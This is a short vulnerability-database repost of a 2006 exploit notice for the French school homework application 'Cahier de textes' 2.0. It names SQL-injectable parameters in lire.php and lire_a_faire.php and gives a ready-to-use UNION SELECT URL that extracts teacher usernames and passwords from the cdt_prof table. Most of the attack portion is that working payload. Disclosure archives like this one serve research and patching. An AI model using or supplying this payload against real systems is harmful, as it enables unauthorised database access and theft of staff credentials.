Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14586
HistoryOct 07, 2006 - 12:00 a.m.

Cahier de textes 2.0 Remote SQL injection Exploit

2006-10-0700:00:00
vulners.com
13

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Cahier de textes

Pierre Lemaitre - St Lф (France) - Ver 2.0

Remote SQL injection Exploit

Discovred By s4mi

s4mi[at]linuxmail[dot]org


#exploit

http://localhost/PATH/lire.php?classe_ID=1&matiere_ID=[SQL]

or
http://localhost/PATH/lire_a_faire.php?classe_ID=[SQL]


expemle of sql code to get admin user and password

http://localhost/PATH/lire.php?classe_ID=1&matiere_ID=-1+union%20select%201,CONCAT(nom_prof,CHAR(58),CHAR(58),passe)%20FROM%20cdt_prof/*